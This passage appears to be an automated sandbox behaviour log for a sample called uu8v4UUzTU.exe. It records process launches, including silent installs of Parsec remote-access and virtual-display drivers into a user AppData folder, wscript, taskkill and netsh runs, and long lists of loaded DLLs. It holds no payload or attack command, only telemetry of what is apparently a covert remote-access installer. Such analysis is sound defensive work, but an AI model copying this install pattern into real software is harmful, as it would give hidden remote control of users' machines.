Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "000000000000018C" "WinSta0\Default"
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\wevtutil.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: winhttpcom.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
